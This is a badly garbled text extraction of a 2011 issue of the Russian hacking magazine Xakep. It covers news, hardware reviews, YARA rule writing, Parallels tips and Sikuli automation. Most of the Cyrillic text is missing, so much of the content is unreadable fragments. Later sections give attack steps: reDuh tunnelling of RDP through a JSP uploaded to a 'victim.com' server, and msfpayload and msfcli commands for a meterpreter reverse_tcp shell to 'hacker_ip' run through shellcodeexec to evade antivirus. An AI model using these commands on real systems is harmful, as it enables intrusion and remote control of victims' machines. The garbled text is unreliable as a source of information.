Хакер 2011 06 PDF

x 06 (149) 2011
.
210
:

GOOGLE CHROME . 62
06 (149) 2011
/ C *NIX
HTML5
. 106
*NIX-
PHP
149
Silverlight:
BlackHole exploit kit
CISCO
UAC

WEB-
Linux
. 56

:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM
INTRO

.
Forb
.
.
, .
, :
10 , 2001 .
147
2 . . , ,
.

400
7 .
.
- . ,
.
:).
nikitozz, . .
http://vkontakte.ru/xakep_mag
Content
MegaNews
004
Ferrum
016
021

14"
076
082
022
026
030
Parallels Desktop:
Mac
10
036
MIX 2011
Sikuli: Python
5
Microsoft
038
Easy-Hack
042
048
052
056
062
066
088
092
098
UAC

?
102
Silverlight
106
HTML5
110
Silverlight-
HTML5
,

SYN/ACK

TMG 2010
payload
120
Cisco
124
DNS: .

PHP-

Google Chrome
X-Tools
-
:
beginners edition
Trend Micro Microsoft Security Essentials

cybercrime
TMG, NIS, GAPA

-
AVG,
075
*nix
114
MALWARE
072
PHREAKING
128
HACK TV
068
HTTP-
032
FSP AURUM GOLD 700 (AU-700)
PC_Zone
Samsung LE650B
134
PSYCHO:
,
140
143
144
FAQ UNITED
FAQ
8.5
WWW2
web-
032

Sikuli: Python
088
056
*nix
PHP-
web-
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

>

>
(maligina@glc.ru)

: 8-800-200-3-999
/PUBLISHING
>
( )
(strekneva@glc.ru)
>

>

> -
(alekseeva@glc.ru)
> MAN TV

>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906
> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>
(polikarpova@glc.ru)
>

>

>
(kosheleva@glc.ru)
>

>

> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

.

. ,
,
.

.
.

:
content@glc.ru
, , 2011
MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
DROPBOX
: Dropbox,

,
. , ,
:
config.db,
%APPDATA%\Dropbox .
email, dropbox_path host_id.
,
. .
Dropbox host_id,
config.db . ,
config.db Dropbox
,
! , , ,
, host_id .
, config.db host_id? ,

Dropbox .
, : bit.ly/dropbox_fail.
Infosecurity Europe ,
, . ,
IT- . 25% ,
, 20% , - Microsoft, 10% ,
:).
JABBER
,
ICQ, icq Mail.ru Group.
, , , . ,
AOL. :). , icq
, , .
, ,
icq.com.
,
ICQ, .
ICQ , , : ICQ- Mail.Ru Group
. ,
.
. , , Mail.ru
.
004
X 06 /149/ 2011
MEGANEWS

Apple.
, . ,
,

, . ,
, ( )
.
. Apple
2009 ,
- .
, .

, , .
- . , ,
:
, .
, ,

.
, Ubuntu (11.10)
GNOME.
.
LIZAMOON
,
- LizaMoon.
. SQL- -,
IIS + MS SQL Server,
. ,
, . , , , . ,
LizaMoon , ,
. .
Google 1 500 000 , URL, ! , ,
, , .
: ,
<script src=hxxp://lizamoon.
com/ur.php></script>,
. ,
Windows Stability Center.
,
, .
, Microsoft , -
006
, , ,
.
X 06 /149/ 2011
WEXLER.HOME 903
>> coding

, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.
. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903 Windows 7 .

64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).
Intel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (, ). , .
GeForce GTX 460,

Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.
WEXLER.HOME 903
4 , .
Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
MEGANEWS
. . .
.
, -
, -, , . , . , Google ,
,
. , , Googles Profiles
, .
, . - .
, Google , . , ,
2009 ,
Like.com,
. , Google , , - ?
, .

.
,
Twitter, Facebook, . , Like it
: Google
+1. UI
, ,
. , ,
. ,
Google Contacts Gmail +1 ,
( ). , +1
,
.
Brande Finance Google

. $44 300 000 000 .
, Commodore, 80-
Commodore Amiga. , Commodore USA
-
008
. Commodore Commodore VIC-Slim,

.
460 x 168 x 16, 1-30.1 , ,
Intel Atom D525 (1,8 )
Intel NM10. 1 2
DDR3-1066, 250 500 ,
Ethernet 100 /, 802.11b/g/n Wi-Fi Bluetooth,
Realtek HD Audio. Commodore VIC-Slim
USB 2.0, COM, VGA, .
. $295 ,
. . 1 ,
250 , Wi-Fi Bluetooth $395.
Wi-Fi Bluetooth, 2 500 $495. :).
X 06 /149/ 2011
MEGANEWS
NINTENDO
Move Play Station Kinect
Xbox 360
, .
, ,
Nintendo Wii. Wii
, Nintendo, , ,

Wii . : 2009
2010-2011
66%! Nintendo, , ,
( , 2012 )
Wii.
Wii 2 2- ,
, . ,

E3,
.
, FullHD (1080p,
720p); ,
Blu-Ray; 3D.
, Wii 2
Stream,
,
. -, .
E3 .
77
138 IT.
HTC
HTC
,
. HTC,
12 ,
:). , Android 2.3 Gingerbread
HTC Sense 3.0,
Sensation (
.). .
Sensation
: Qualcomm Scorpion 1.2
+ GPU Adreno 220 768

. SLCD- 4.3"
960540
Gorilla Glass.
, :
, HTC Mozart HTC Desire S.
:
VGA 8- LED, 1080p.
1520 . MicroUSB- Sensation
MHL. ,

HTC Sense
3.0, .
-
. , ,
25-28 000 .

,

. ,
,
, , 1%
. , 1%,
?
, :
, ,
, -
010
, ,
, ,
, ,
.
, , DVD, , ,
(,
, , ?), .
, , ?
100-150
.

:
, ,

.
, ,
1%
.
(, ,
) ,
, , .

,

. , , , .
X 06 /149/ 2011
MEGANEWS
SONY
, Sony
GeoHot ,
. ,
GeoHot -
PS3
. ,
, Sony
,
, : geohotgotsued.
blogspot.com. ,

GeoHot 31 .
Sony,
, .
,
$10 000 $250 000.
, Sony ,
, .
$10 000,
Sony, Electronic
Frontier Foundation. ,
,

DMCA ACTA, ,
, .
,
:).
,
. 7- 2011 17
.ru.

! 8 2011
N63-
.
, ,
. (1-)
, ,
.
, .

( )

.
,
,
,
, - .

.
: ,
.
,

,
. ,
, .

: rg.ru/2011/04/08/podpisdok.html.
APPLE STORE

, , ,
. ifoAppleStore.com ,
-
Apple .
,
:
Apple Store . ,

,
. , :
012
2002 ,

2011 2012 . Apple, ,
1500 2.
ifoAppleStore.com,
,
.
Apple
(
iPad 2 120 000
)? .
X 06 /149/ 2011
IMAGINE CUP
16
( ) Microsoft Imagine Cup 2011. Imagine
Cup 8 000 ,
.

. , , Windows Phone 7
Worldwide Telescope . , ,
. . ,
, ,
(
). ,
,
-.
Oriteam
Oricrafter.
.
Calvus
,
.
-!
4% 130 000 000 Avast

-
(110411-1). ,
Avast .
. .
IPHONE . ANDROID .
: .
, Apple (iPhone iPad)
. ,
,
Wi-Fi. ,
, iOS 4. consolidated.db,

iTunes. , ( -)
Apple - , ,
, .
. ? iPhone Tracker (petewarden.github.com)
, ,
iTunes.
, ... , ,
.
? ,
, iTunes Encrypt iPhone Backup. ,
X 06 /149/ 2011

Android-
. cache.cell cache.wifi,
/data/data/com.google.android.location/files,
consolidated.db. Android 50
200 WiFi-. :
12 48 WiFi.
013
MEGANEWS
WORDPRESS
Wordpress
. ,
Wordpress ,
Wordpress.com
DDoS-,
18 000 000 ,
VIP.
,

,
,
.
Wordpress .
:
root- Automattic, -
WordPress.com. -
, VIP, ,
,

( Facebook Twitter),
(, Amazon S3). , SSL-.

Automattic,
root-,
, ,
.
WEXLER
WEXLER, ,
, . , WEXLER.BOOK T5002, 5- TFT-
LED-. , ,
. , , WEXLER.BOOK T5002
( ASCII, TXT, DOC,PDB,HTML,PDF, FB2), (WMV,
RM, AVI, RMVB, 3GP, FLV, MP4, DAT, VOB, MPG, MPEG, MKV, MOV), (JPEG, BMP, GIF),
(MP3, WMA, APE, FLAC, AAC),
. , ,
WEXLER :
TFT- WEXLER.BOOK T5002 .
7 , 4 ,
- ( ) 25 .
,
.
. WEXLER.BOOK T5002 G-,
.
3499 . WEXLER.BOOK T5002
, .
YOUTUBE
YouTube ,
.
. YouTube ,
.
, -
- ,
, ... .
,
YouTube (Copyright
shcool),
Happy tree friends
(!), ,
,
. .
: youtube.com/
copyright_school.
.
SMS-
.
- 1530%.
014
X 06 /149/ 2011
DA 5000 PRO
, 5.1
DA 5000 Pro Edifier. ,
, DA5000 Pro .
: -,
DA5000 ( ), , -, DA 5000
Pro
- C3. - MDF
9 , 3 ,
DA 5000 Pro .
.
, LED-
,
, FLASH- / .
: (RMS)
212, (RMS) 212,
(RMS) 12, -
(RMS) 60. 160-20000

, 20-160 .
20 . : 450 . DA 5000
Pro $235.
Fortune , Twitter
. Facebook Twitter
$2 000 000 000 , Google $10 000 000 000.
.

, ,
. ,
, .
- (Pokerstars, Full Tilt
Poker Absolute Poker) . ,

.
:
, ,
,
.
,
,
( ). PokerStars Full Tilt
Poker , ,
, .
, .
Absolute Poker

,
- .
X 06 /149/ 2011
015
FERRUM

14"
,
, ,
. ,
,
: ,
, , . .

, ,
, ,
14 .

3DMark06. ,
PCMark Vantage ,
7-Zip WinRAR
-, SuperPI,
.
Battery Eater Pro,
:
, Wi-Fi 40%. :
, .

, .
, , , .
? - ,
- ,
. -,
. .
,
.
, , ,
.
016
X 06 /149/ 2011
26000 .
39000 .
Acer Aspire TimeL

ineX 3820T
ASUS
U43Jc
: 13.3"
: Intel Core i5-430M, 2266
: 4 DDR3-1066
: ATI Mobility Radeon HD 5650, 1024 , Intel GMA HD
: 300
: 32423522
: 1.8
: 14"
: 4 DDR3-1066
: NVIDIA GeForce 310M, 1024 , Intel GMA HD
: 500
: 344x241x32
: 2.18
Acer ,
. Acer Aspire TimeLineX 3820T .

Intel Core i5,
, . 3DMark06,
Acer Aspire TimeLineX .
. , ,
. ,
.
, , ,

.
ASUS U43Jc . ,
. :
Intel Core i7
NVIDIA, ASUS U43Jc .
.
0.5 .
- -,
. ,
2.5 .
,
, . , ,
.
X 06 /149/ 2011
. ,
.
017
FERRUM
31000 .
24000 .
Dell
Vostro 3300
HP Pavilion
dm4-1100
: 13.3"
: 4 DDR3-1066
: NVIDIA GeForce 310M (1024 ), Intel GMA HD
: 500
: 325x229x29
: 1.81
: 14"
: 4 DDR3-1066
: ATI Mobility Radeon HD 5470, 512 , Intel GMA HD
: 500
: 341x228x32
: 2
, , , .
Dell Vostro 3300. , ,
. , ,
, ,
, . :
Intel Core i7, 4 ,
0.5 .
, , .
, ,
,
, .
:
(

) Intel Core i5 ( ). 14
,
. , , 500 .
, ,
.
, . ,
.
018

, F1-F12 Fn
.
X 06 /149/ 2011
30000 .
30000 .
Samsung
SF410-S01
Sony
VPC-YA1V9R/B
: 14"
: 4 DDR3-1333
: NVIDIA GeForce 310M, 512 , Intel GMA HD
: 500
: 347x246x32
: 2.17
: 11.6"
: Intel Core i3-380UM, 1333
: 4 DDR3-1333
: Intel GMA HD
: 500
: 290x202x25
: 1.5
Samsung . .
,
(
).
Samsung SF410-S01 , , ,
.
!
Sony ,
12, 1.5 . ,
Intel Core i3-380UM, 1.5
.
, .

, .
.

, , .
X 06 /149/ 2011
, .
,
.
019
FERRUM
PCMark Vantage,
3DMark06,
Sony VPC-YA1V9R/B
Sony VPC-YA1V9R/B
Samsung SF410-S01
Samsung SF410-S01
HP Pavilion dm4-1100
Dell Vostro 3300
Dell Vostro 3300
ASUS U43J
ASUS U43J
Acer Aspire TimeLineX 3820T

0 1000 2000 3000 4000 5000 6000 7000
Sony
0 1000 2000 3000 4000 5000 6000 7000 8000
WinRAR, /
7-Zip,
Sony VPC-YA1V9R/B
Sony VPC-YA1V9R/B
Samsung SF410-S01
Samsung SF410-S01
Dell Vostro 3300
Dell Vostro 3300
ASUS U43J
ASUS U43J

0 200 400 600 800 1000 1200 1400 1600 1800 2000
0 1000 2000 3000 4000 5000 6000 7000 8000
Sony
Super Pi,
Sony VPC-YA1V9R/B
Sony VPC-YA1V9R/B
Samsung SF410-S01
Samsung SF410-S01
Dell Vostro 3300
Dell Vostro 3300
ASUS U43J
ASUS U43J

0
10
15
20
25
30
35
40
0 20 40 60 80 100 120 140 160 180 200
Samsung
. Samsung SF410-S01
,
Acer Aspire TimeLineX 3820T,
. z
, ,

020
X 06 /149/ 2011
FERRUM

FSP AURUM GOLD 700 (AU-700)
: 700
: 87%
+12V: 4
: +3.3V 28 , +5V 28 , +12V1-V4
18 , -12V 0.5 , +5Vsb 3.5
: +3.3V & +5V 160 ,
+3.3V & +5V & +12V1 & +12V4 672
PFC:
: 120
: 150x140x86
: 1.9
: 3700 .

.
, . ,
.
,
. FSP,
AURUM ( )
.
AURUM GOLD 700.

, ,
, ,
FSP. AURUM GOLD 700
-
. ()
:
, . ,
6+2 pin, SATA Molex.
.
AURUM GOLD 700 700 , 87% ( 80Plus Gold). 28 +3,3V +5V, 18
+12V. 120- ,
.

FSP AURUM GOLD 700
X 06 /149/ 2011
D-RAM DBS-2200.
. 850 .

.
. +12V
100 ,
+3.3V +5V 20 . .
+12V 200 , .
FSP AURUM GOLD 700: +3.3V &
+5V 160 , +12V1 & +12V4 500 .
, : +3.3V, +5V, +12V.
( )
, , . - ATX 1% 5%.
?
FSP AURUM GOLD 700
. , ,
,
.
, ,

, .

+ 80 PLUS Gold
+
-
-
-
, . 3%,
.
,
. AURUM
GOLD 700 , ,
. , ,
. z
021
PC_ZONE
Ant

.
,

/.
.

, .
. ,
, ,

. ,
,
.
,
-, .
-
, . .
,
. , ,
022
.
. , N .
, (
EB ?? ?? CD 13). - . .
,
, (, ASPack).
,
PEiD,
, ( ) PE-. ,
,
,
. , PEiD (
) .
X 06 /149/ 2011

YARA
- , .
, ,
. YARA (code.google.com/p/yara-project).
YARA?
, - ,
.
,
-, , .
, YARA.

.
, , .
. ,
,
.
, ( ,
-). , ,
:
rule silent_banker : banker
{
meta:
description = "This is just an example"
thread_level = 3
in_the_wild = true
strings:
$a = {6A 40 68 00 30 00 00 6A 14 8D 91}
$b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
$c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
condition:
$a or $b or $c
}
YARA, , -, $a,
$b, $c, silent_banker.
.
( ).
YARA ,
, :
VirusTotal Malware Intelligence Services (vt-mis.com);
jsunpack-n (jsunpack.jeek.org);
We Watch Your Website (wewatchyourwebsite.com).
Python,
, , YARA X 06 /149/ 2011
ASPack
. ,

.
, ,
YARA , PEiD.
.
, Python,
Linux, Windows, Mac.
.
, .
$ yara
usage: yara [OPTION]... [RULEFILE]... FILE | PID
:
, ,
, ( , ), .
- , ,
. - , YARA
.
: ?
(- , - ). ,
, - -
. , ,
. ClamAV
(clamav.net/lang/en). Latest
Stable Release ,
ClamAV. main.cvd (db.
local.clamav.net/main.cvd) daily.cvd (db.local.clamav.net/daily.cvd).
,
. daily.cvd, 100
000 . ClamAV YARA,
. ?
ClamAV, Yara. ,
,
ClamAV YARA. clamav_to_
yara.py (bit.ly/ij5HVs).
:
$ python clamav_to_yara.py -f daily.cvd -o clamav.yara
clamav.yara ,
.
023
PC_ZONE
ASPack-
system32
YARA ClamAV .
:
PEiD YARA
$ yara -r clamav.yara /pentest/msf3/data
-r ,
.
/pentest/msf3/data - (
, ClamAV), YARA
. , .
,
ClamAV, YARA. . ,
/.
.
, ,
- . ( ) struct{} /++.
rule BadBoy
{
strings:
$a = "win.exe"
$b = "http://foo.com/badfile1.exe"
$c = "http://bar.com/badfile2.exe"
condition:
$a and ($b or $c)
4. condition .
, ,
.
. , true,
, false .
, ,
win.exe URL,
BadBoy ( ).
5.
, : (wildcards), (jumps)
(alternatives). , , .
?:
$hex_string = { E2 34 ?? C8 A? FB }
,
, .
, :
$hex_string = { F4 23 [4-6] 62 B4 }
, 4
6 .
:
, .
, . :
1. rule,
.
, C/++,
, .
128 .
2. :
(strings) (condition). strings
, condition
, .
3. strings ,
$ , php. YARA ,
( ) ,
({}), :
$my_text_string = "text here"
$my_hex_string = { E2 34 A1 C8 23 FB }
024
$hex_string = { F4 23 ( 62 B4 | 56 ) 45 }
, 62 4 56,
F42362B445 F4235645.
6. , ,
at:
$a at 100 and $b at 200

, in:
$a in (0..100) and $b in (100..filesize)
6. , ,
.
of:
rule OfExample1
{
X 06 /149/ 2011
system32 YARA
strings:
$foo1 = "dummy1"
$foo2 = "dummy2"
$foo3 = "dummy3"
condition:
2 of ($foo1,$foo2,$foo3)
}
,
($foo1,$foo2,$foo3).
any ( ) all ( ).
7. , . of,
for..of:
for expression of string_set : ( boolean_expression )
: , string_
set, expression
boolean_expression. , : boolean_expression
string_set, expression
True.
.
PEiD
, ,
.

PEiD. plugins userdb.txt,
, . 1850 .
, , ,
- .
,
:
[Name of the Packer v1.0]
signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B
C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
ep_only = true
,
PEiD, .
. ep_only, X 06 /149/ 2011
, ,
.
, , , ASPack? , . , , packers.yara.
PEiD , ASPack,
:
rule ASPack
{
strings:
$ = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? (43 | 44)
?? B8 ?? ?? (43 | 44) ?? 03 C5 }
$ = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }
[.. ..]
$ = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3
E8 01 }
condition:
for any of them : ($ at entrypoint)
}
ep_only true,
.
: for any of them : ($ at entrypoint).
,
, ASPack.
,
$, . ,
condition- - ,
.
, :
$ yara -r packers.yara somefile.exe
, ASPack, , !
YARA . -.
,
,
. , ,
. ,
! z
025
PC_ZONE

PARALLELS
DESKTOP:
MAC
10

Windows-
Linux-. Mac OS X .
Mac
Parallels Desktop.
. Mac OS
.
Virtual PC for Mac,
026
.
- .
, Apple -
Intel ( X 06 /149/ 2011
PD

: Coherence
) Boot Camp
Mac OS Windows.
Parallels, ,
Parallels Desktop for Mac.
Intel VT,
.

,
.

( , USB- ). , , .

.
Parallels Desktop
.
Virtual Box.
Mac.
Parallels Desktop ,
. ,
, .
Apple,
. PD6
, , .
#1.
RAM
RAM (, ,
Mac) , (Mac OS Windows) -
. Parallels Desktop 1 . ,
,
, .
:
Mac OS, -
. ?
: ,
X 06 /149/ 2011
Windows
, Parallels Desktop.
. ,
,
,
. Windows 7

(resmon.exe) . (+10%
) .

. , . ,
RAM , .
( HDD)
Mac OS.

. PD
64 ,
Windows ,
.
#2. 1,5-2

Apple MacBook Pro. : Intel HD Graphics
nVidia. :
,

, 3D-. ,
Windows 7, Aero. ,
DirectX . Aero ,
Windows ,
. , Parallels
Desktop ,
DirectX (
Mac OS), OpenGL. , ,
. .
, Mac
,
.
( ) . ,

3D-, -
027
PC_ZONE
FPS
. PD
3D-.
.
.
3D- , , . ,
.
( Aero) Windows 7
Windows XP 32 (!). ? :
1,5-2 .
, -
. , 3D, . .
#3. PD6
FPS
, Parallels Desktop
, Windows
. .
,
(
). :
1. PD.
2. Windows.
3.
.
, , Far Cry 2. .
, FPS (frames per second
). video.
showFPS=1,
(
).
: FPS,
, .
#4.
Parallels Desktop ,

.
,
,
028
FPS,
,
. , .

.pvm, /Users/ <_
>//Parallels.
Finder ( ).
config.pvs. XML-.
TextEdit .
, . , ,
.
. - ,
pvm.
#5.

Parallels Desktop 50
Mac OS X Red Hat Enterprise.

( Windows).
, , ,
Parallels Desktop , , .
, . PD
. config.pvs TextEditor, <Cmd+F>
<Autostart>0<Autostart> 0 2.
PD, .
X 06 /149/ 2011
#6.
Windows 7

Windows 7. , BIOS,
Windows 7.
, .
, ,
. ! BIOS, config.pvs
TextEditor <HideBiosOnStartEnabled>0</
HideBiosOnStartEnabled>, 0 1. Windows 7, <DisableWin7Logo>1</DisableWin7Logo>.
config.pvs
#7.
Coherence
Parallels Desktop
Coherence, Windows- Mac,
. , ,
.
PD :
Windows,
. ,
- Windows.
.
, .

. : config.pvs TextEditor <DisableDropShadow>0</
DisableDropShadow>.
#8. SmartMount
Parallels Desktop SmartMount,

(
), DVD.

, ,
. config.pvs
<SharedVolumes> :
) :
<UseExternalDisks>1</UseExternalDisks>. 1,
0 ( )
) CD/DVD-:
<UseDVDs>1</UseDVDs>.
) /
: <UseConnectedServers>1</
UseConnectedServers>.
X 06 /149/ 2011
#9.

Windows Windows Mac OS X.

,
. ,
Windows Mac
OS X , - , Windows Mac OS X.
Mac OS X, config.pvs
AutoMountNetworkDrives.
, Parallels Desktop
Mac.
Windows ,
. Mac OS X. ,
, Windows.
#10.
,
.
. , ( , ),
, ,
. , ?! Suspend/Resume,

.

.
, . z
029
PC_ZONE
Step (twitter.com/stepah)
HTTP-

, HTTP-.
,
TCP- HTTP, ,
. ,

-, .

-,

,
!
,
HTTP GET- POST-

.
,
base64.
,
.

: reDuh (sensepost.com/labs/
tools/pentest/reduh) HTTPTunnel (httptunnel.sourceforge.net). ,
(, -)
: JSP, PHP
ASPX. ,
-,
.

Java , ,
. ,
?
.
, ,
,
HTTP-.
, -
RPD-
term-serv.victim.com,
-
. HTTP-
030
.
HTTP. :
1.
reDuh.jsp,
(
ubunt00.victim.com/uploads/reDuh.jsp).
,
.
2.
reDuh reDuhClient.
,

:
$ java reDuhClient ubunt00.victim.com
80 /uploads/reDuh.jsp
3.

,
1010 .

1234 3389 (RPD) termserv.victim.com,
:
[createTunnel]
1234:term-serv.victim.com:3389
4. , RDP-
localhost:1234, TCP-
HTTP-,
ubunt00.victim.
com/uploads/reDuh.jsp,
.
,
.
, reDuh ,

(, SSH) !
HTTPTunnel,
.

GUI- ( Windows).
:
PHP Perl. HTTPTunnel
SOCKS-.
, (,
RDP-), (
, term-serv.victim.com).
, SOCKS,
HTTPTunnel. ,
-
,
FreeCap (freecap.ru), tsocks (tsocks.
sourceforge.net) . z
X 06 /149/ 2011
Might & Magic

, . , .
Parasite Eve
,
RPG-.
PC_ZONE
Sikuli:
Python
, WYSIWYG-,
- ,
HTML-? Sikuli
,
.
: , .
What You See is What You Script ,
Sikuli. , . Sikuli
Wixarica ,
. 2008 ,
032

-
(MIT), EECS MIT
, .
, (, X 06 /149/ 2011
)
. Sikuli
.
()
.
, hover()
Windows, , Sikuli . ,
.
,
, , Sikuli
. ,
, ,
- API. , -,
Windows/Linux/MacOS- iPhone/Android,
VNC. Sikuli
-
. , Sikuli
Jython, Python.

AutoIt.
Sikuli .
.
Sikuli
,
,
IP- Mac OS X.
,
.
, . , , .
,

. Windows.
API- :

, .
,

,

. ,
API-
.
, , ,
. , ,
AutoIt (autoitscript.com/autoit3), .
, .
, Computer Management
,
:
Run ('cmd /c "compmgmt.msc"',
@SystemDir, @SW_HIDE)
WinWaitActive("Computer Management")
, C++,
. ,
(
AutoItMacroGenerator),
X 06 /149/ 2011
-, , , Sikuli.
Linux Windows.
Sikuli Java, .
,
(click(), wait(), type() ),
, .
,
, . ,
click()
- .
?
, IDE, Sikuli.

: ,

. ,
- ,
click(),
. ,
,
. !
HTTP://WWW
links

,
Q&A,

:
answers.launchpad.
net/sikuli.
033
PC_ZONE
Sikuli
3 Sikuli
1. . , API.
, ,
?

Sikuli. ,
,

.
2. . ,
GUI-, ,
.
, Sikula
Robot Framework,
: bit.ly/kUYNwn.
Sikuli -.
3. . ,
Youtube ,
.
. Python,
(, , , ,
Sikuli ).
,

. :
click(img) ,
;
doubleClick(scr) ;
rightClick(scr) ;
hover(scr) img
;
exists(scr) true, ;
034
openApp(app) app;
switchApp(app) app (
, openApp);
type(text) text;
type(scr, text) text
scr;
popup(msg) msg.
, , . ,
.
, , -

RoutineBot (routinebot.com)
,
. ,
,
. Pascal, JScrpt Basic.
, Sikuli, ,
.
Ranorex (ranorex.com)
,
. C#, VB.NET
Python. Visual Studio
Ranorex
Recorder.
T-Plan Robot (t-plan.com)
VNCRobot ,
, VNC- ,
.
.
EggPlant (testplant.com)
, T-Plan Robot, VNC .
Linux, Windows, Mac.
X 06 /149/ 2011
Sikuli?
Like

Sikuli Script.
, GUI
.
Java Jython, . java.awt.Robot
. C++, OpenCV.
Sikuli (.sikuli) ,
Python (.py)
(.png). Sikuli . .sikuli zip
.skl-.
Sikuli IDE , . ,
Sikuli Script IDE (, Eclipse),

-.
Skype
, - ,
Python,
.
(sikuli.org/
demo.shtml), ,
.
:
1. Facebook Like.
2. Skype.
3. -,
.
4. - Bejeweled.
5. Android.
Sikuli ,
. , . z
Sikuli -
X 06 /149/ 2011
035
PC_ZONE

MIX 2011
5
Microsoft
MIX? ,
Microsoft
web-. ,

. 5 MIX 2011 z.
IE10 Platform Preview
IE9, MIX
Internet Explorer 10 Platform Preview 1
,
IE. ,
Platform Preview :
.
IE10 PP1 CSS3:
CSS3 Multi-column Layout
CSS3 Grid Layout
036
CSS3 Flexible Box Layout

CSS3 Gradients
, EcmaScript5 Strict Mode,

JavaScript,
. Strict Mode
,
delete .
IE10 PP1 DVD,
ie.microsoft.com/testdrive.
X 06 /149/ 2011
Internet Explorer Platform Preview 1
ASP.NET MVC 3
web ASP.NET MVC 3. ,

HTML5,
. ,
ASP.NET MVC Modernizer
jQuery.
WebMatrix
web-, web-,
SQL Server Compact .
WebMatrix,
web- ASP.NET PHP.
WebMatrix web-,

CMS DotNetNuke, Umbraco, WordPress
Joomla!.
Windows Phone OS 7.5
2011 Windows Phone

. ,

Windows Phone Marketplace.

,
.
WP7 ,
,
. ,
,
.
,

30% .
Internet Explorer 9
, IE
, .
JavaScript.
, HTML5 Video,
Microsoft -
: Windows Phone
26fps, iPhone 2fps, Android
11fps.
Microsoft 1 500 API ,
, ,
X 06 /149/ 2011
WebMatrix
CMS
,
, SQL- SQL Server Compact 4.0
. ,
- :
,
.
,
. ,
.
WP7:
Skype, 25 Angry
Birds.
Silverlight 5 Beta
Silverlight 5
, API.
x64- ,
.
Silverlight- :
,
;
(,
USB-);
.
, :

Trickplay /
-.
: ,
.
Kinect for Windows SDK
Kinect
, Microsoft
.
MIX SDK,
Kinect :
,
.
Kinect for Windows SDK 3D-,
Kinect ,
,
. SDK C#/VB/C++: ,
Visual Studio Kinect
SDK . z
037

GreenDog ,
(agrrrdog@gmail.com)
DSecRG.ru, Digital Security (agrrrdog@gmail.com)
Easy Hack
1
: EXE
OLLYDBG.
:
, , - ,
. . , , .
, exe
, , .
OpenEdge
,
. , ,
, .
? , , .
OllyDbg. -,
IDA Pro WinDbg, -,
.
, . , , (). OllyDbg
, .
. , .
, <>, .
, ,
View Patches. , OllyDbg
,
, .
, , , , .
, .udd-,
OllyDbg ( udd path ).

, ,
. , ,
. :
1.
2.
3.
4.
5.
.
Copy to Executable.
All modification.
.
Save file.
.
: exe . ,
. exe,
, .
:

OLLYDBG.
:
() . ,
,
- . ,
,
. . ,
OllyDbg ,
:
1) Options Debugging Options Security;
2) Ignore Crc of ode section.
038

X 06 /149/ 2011
,
INT3/0xCC, . , .
Break point manager
plug-in, : pedram.redhive.com/code/
ollydbg_plugins/olly_bp_man. / ,
:

.
:
, - :). :
- , . ,
! ,
. ,
tracerout (tracert).
ICMP- TTL 1
, ,
1.
(TTL 0 ) .
IP .
, IP- . , .

tracert. ? tracert.
? ICMP , - IP-,
.
.
-
:
WEB-.
- ? :)
X 06 /149/ 2011
. .

- . , , -
.
Immunity Debugger, .
, IP- , NAT .
BackTrack4
0trace (lcamtuf.coredump.cx) . intrace (code.google.com/p/intrace)
.
:
1)
ncat h victim_net.com 21
2)
0trace eth0 victim_net.com 21
:
h victim_net.com ;
21 , (/
);
eth0 .
, .
, .
- . ,
. TTL ()
128 , 100% Windows; 64255 , *nix.
.
:
.
,
Firefox .
. , ,
,

FF, . , ,
- .
, ,
YEHG HackerFirefox,
Ultimate Hackerfox Addons
GreaseMonkey Web Security
Toolkit (yehg.net/lab/#tools). ,
,
.
,
Mantra (getmantra.
com/download/index.html).
,
, .

.
039
: .
:
:)
- ,
.
. , , payload Metasploit
Framework meterpreter. , , MSF, meterpreter
. - . ,
antimeter
meterpreter . , antimeter .
post-exploitation meterpreter,
. ?
antimeter,
, . ! :) . .
, ? -.
, . shellcodeexe :
https://github.com/inquisb/shellcodeexec.
c , . ,
exe,
, .
.
1. shellcodeexe ;
2. - - ;
3. - ;
4. ( ) RWX,
, ;
5. () - .
,
.
: bernardodamele.blogspot.com/2011/04/execute-metasploitpayloads-bypassing.html. :
1. -
- EAX,
:
WINDOWS
.
:
.
(Group Policies) ,

Windows
....
, ( ).
, -
IE , . ,
.
c:\windows\system32\gpedit.
msc (secpol.msc) . ,
,
, ,
.

040

:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=hacker_ip R | msfencode -a x86 -e x86/
alpha_mixed -t raw BufferRegister=EAX > payload.txt
2. meterpreter :
msfcli multi/handler PAYLOAD=windows/meterpreter/
reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= hacker_ip E
3. -
Type payload.txt > shellcodeexec.exe
4. -
. . -,
- shellcodeexe,
. -, - ( , , ),
, , . ?
- RWX-. , ,
, . , .
,
- , ,
. , , . shellcodeexe
, .
.
.
